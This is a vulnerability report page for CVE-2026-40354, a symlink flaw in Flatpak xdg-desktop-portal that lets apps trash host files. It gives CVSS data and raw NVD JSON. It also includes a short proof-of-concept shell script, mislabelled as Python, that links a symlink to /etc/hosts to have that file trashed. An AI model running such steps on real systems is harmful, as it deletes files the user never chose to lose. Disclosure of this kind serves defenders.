Security Vulnerability Report
中文
CVE-2026-40354 CVSS 2.9 LOW

CVE-2026-40354

Published: 2026-04-11 01:16:16
Last Modified: 2026-04-27 23:11:58
Source: [email protected]

Description

Flatpak xdg-desktop-portal before 1.20.4 and 1.21.x before 1.21.1 allows any Flatpak app to trash any file in the host context via a symlink attack on g_file_trash.

CVSS Details

CVSS Score
2.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:flatpak:xdg-desktop-portal:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:flatpak:xdg-desktop-portal:1.21.0:*:*:*:*:*:*:* - VULNERABLE
Flatpak xdg-desktop-portal < 1.20.4
Flatpak xdg-desktop-portal 1.21.x < 1.21.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # PoC for CVE-2026-40354 # Demonstrates the symlink attack concept HOST_FILE="/etc/hosts" SYMLINK="exploit_link.txt" echo "[+] Creating symlink pointing to host file..." ln -s $HOST_FILE $SYMLINK echo "[+] Triggering trash operation via portal..." # In a real scenario, the Flatpak app calls the portal DBus interface # which invokes g_file_trash on the symlink # gio trash $SYMLINK echo "[!] If successful, $HOST_FILE is trashed."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40354", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:16.270", "lastModified": "2026-04-27T23:11:58.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flatpak xdg-desktop-portal before 1.20.4 and 1.21.x before 1.21.1 allows any Flatpak app to trash any file in the host context via a symlink attack on g_file_trash."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flatpak:xdg-desktop-portal:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.20.4", "matchCriteriaId": "6EE2AC77-CD98-4889-B26F-9EB4391D3970"}, {"vulnerable": true, "criteria": "cpe:2.3:a:flatpak:xdg-desktop-portal:1.21.0:*:*:*:*:*:*:*", "matchCriteriaId": "9314DB96-4EDF-43A8-BC7A-5074770F1E4A"}]}]}], "references": [{"url": "https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.20.4", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/flatpak/xdg-desktop-portal/releases/tag/1.21.1", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/flatpak/xdg-desktop-portal/security/advisories/GHSA-rqr9-jwwf-wxgj", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/10/14", "source": "[email protected]", "tags": ["Mailing List"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.